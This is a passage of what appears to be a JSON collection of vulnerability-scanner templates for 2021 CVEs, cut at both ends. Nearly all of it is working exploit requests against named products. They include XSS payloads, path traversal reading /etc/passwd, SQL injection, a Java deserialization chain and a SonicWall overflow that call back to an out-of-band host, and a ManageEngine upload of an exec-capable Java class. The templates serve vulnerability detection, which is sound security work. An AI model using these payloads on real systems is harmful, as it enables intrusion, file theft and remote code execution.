<wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Pie Register","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-27309","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>.php"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-40960","info":{"name":"Galera WebTemplate 1.0 Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21087","info":{"name":"Adobe ColdFusion - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js","{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js","{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js","{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js","{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["eval\\(\\\"\\(\\\"\\+json\\+\\\"\\)\\\"\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-35488","info":{"name":"Thruk 2.40-2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/thruk/cgi-bin/login.cgi?thruk/cgi-bin/status.cgi%3fstyle=combined&title=%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["'></script><script>alert(document.domain)</script>","Thruk Monitoring"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-46418","info":{"name":"Telesquare TLR-2855KS6 - Arbitrary File Creation","severity":"high"},"requests":[{"raw":["PUT /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n\n{{randstr}}\n","GET /cgi-bin/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 201","contains(server_1, \"lighttpd\") && contains(content_type_2, \"text/plain\")","contains(body_2, \"{{randstr}}\")"],"condition":"and"}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/themes/jnews/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Change Log:","JNews -"],"condition":"and"}]},{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34473","info":{"name":"Exchange Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com","{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com"],"matchers":[{"type":"word","part":"body","words":["Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException","Exchange MAPI/HTTP Connectivity Endpoint"],"condition":"or"}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44138","info":{"name":"Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/;/WEB-INF/web.xml","{{BaseURL}}/resin-doc/;/WEB-INF/resin-web.xml"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","application/xml"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24970","info":{"name":"WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex  HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"All-in-One Video Gallery\")","contains(body_2, \"Hello world!\")","contains(body_2, \"Welcome to WordPress\")"],"condition":"and"}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-26723","info":{"name":"Jenzabar 9.2x-9.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39501","info":{"name":"EyouCMS 1.5.4 Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28169","info":{"name":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/static?/%2557EB-INF/web.xml","{{BaseURL}}/concat?/%2557EB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","part":"body","words":["</web-app>","java.sun.com"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27330","info":{"name":"Triconsole Datepicker Calendar <3.77 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/calendar/calendar_form.php/\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>TriConsole.com - PHP Calendar Date Picker</title>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24647","info":{"name":"Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/pie-register/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{randstr}}&pwd={{randstr}}&social_site=true&user_id_social_site=1&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/profile.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_1, \"pieregister\")","contains(body_3, \"Username\") && contains(body_3, \"email-description\")"],"condition":"and"}]}]},{"id":"CVE-2021-24862","info":{"name":"WordPress RegistrationMagic <5.0.1.6 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-registration-form-builder-with-submission-manager/admin/js/script_rm_utilities.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"rm_user_role_mananger_form\")"],"condition":"and"}]}]},{"id":"CVE-2021-22911","info":{"name":"Rocket.Chat <=3.13 - NoSQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/v1/method.callAnon/getPasswordPolicy HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"message\": \"{\\\"msg\\\":\\\"method\\\", \\\"method\\\": \\\"getPasswordPolicy\\\", \\\"params\\\": [{\\\"token\\\": {\\\"$regex\\\": \\\"^{{randstr}}\\\"}}] }\"}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[error-invalid-user]","\"success\":true"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30049","info":{"name":"SysAid Technologies 20.3.64 b14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27310","info":{"name":"Clansphere CMS 2011.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/elementor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["Elementor Website Builder","Elementor Page Builder"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4')"]},{"type":"regex","part":"body","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-21402","info":{"name":"Jellyfin <10.7.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/","{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/octet-stream"]},{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File 